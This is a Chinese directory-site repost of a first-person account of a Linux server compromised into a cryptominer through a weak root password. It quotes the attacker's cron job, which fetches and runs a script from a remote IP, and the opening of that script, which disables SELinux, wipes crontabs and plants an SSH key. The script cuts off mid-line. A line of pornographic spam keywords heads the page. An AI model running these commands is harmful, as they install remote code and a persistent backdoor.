日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

周一早上剛到辦公室,就聽到同事說有一臺服務(wù)器登陸不上了,我也沒放在心上,繼續(xù)邊吃早點,邊看幣價是不是又跌了。

 

記一次Linux被入侵,服務(wù)器變“礦機”的全過程

 

 

不一會運維的同事也到了,氣喘吁吁的說:我們有臺服務(wù)器被阿里云凍結(jié)了,理由:對外惡意發(fā)包。

我放下酸菜餡的包子,SSH 連了一下,被拒絕了,問了下默認的 22 端口被封了。

讓運維的同事把端口改了一下,立馬連上去,順便看了一下登錄名 :root,還有不足 8 位的小白密碼,心里一涼:被黑了!

查找線索

服務(wù)器系統(tǒng) centos 6.X,部署了 Nginx,Tomcat,redis 等應(yīng)用,上來先把數(shù)據(jù)庫全備份到本地,然后 Top 命令看了一下,有 2 個 99% 的同名進程還在運行,叫 gpg-agentd。

 

記一次Linux被入侵,服務(wù)器變“礦機”的全過程

 

 

google 了一下 GPG,結(jié)果是:GPG 提供的 gpg-agent 提供了對 SSH 協(xié)議的支持,這個功能可以大大簡化密鑰的管理工作。

看起來像是一個很正經(jīng)的程序嘛,但仔細再看看服務(wù)器上的進程后面還跟著一個字母 d,偽裝的很好,讓人想起來 windows 上各種看起來像 svchost.exe 的病毒。

繼續(xù)排查:

ps eho command -p 23374netstat -pan | grep 23374 

查看 pid:23374 進程啟動路徑和網(wǎng)絡(luò)狀況,也就是來到了圖 1 的目錄,到此已經(jīng)找到了黑客留下的二進制可執(zhí)行文件。

接下來還有 2 個問題在等著我:

  • 文件是怎么上傳的?
  • 這個文件的目的是什么,或是黑客想干嘛?

History 看一下,記錄果然都被清掉了,沒留下任何痕跡。繼續(xù)命令 more messages:

 

記一次Linux被入侵,服務(wù)器變“礦機”的全過程

 

 

看到了在半夜 12 點左右,在服務(wù)器上裝了很多軟件,其中有幾個軟件引起了我的注意,下面詳細講。

邊找邊猜,如果我們要做壞事,大概會在哪里做文章,自動啟動?定時啟動?對,計劃任務(wù):

crontab -e 

 

記一次Linux被入侵,服務(wù)器變“礦機”的全過程

 

 

果然,線索找到了。

作案動機

上面的計劃任務(wù)的意思就是每 15 分鐘去服務(wù)器上下載一個腳本,并且執(zhí)行這個腳本。

我們把腳本下載下來看一下:

curl -fsSL 159.89.190.243/ash.php > ash.sh 

腳本內(nèi)容如下:

uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa 

分享到:
標簽:入侵
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定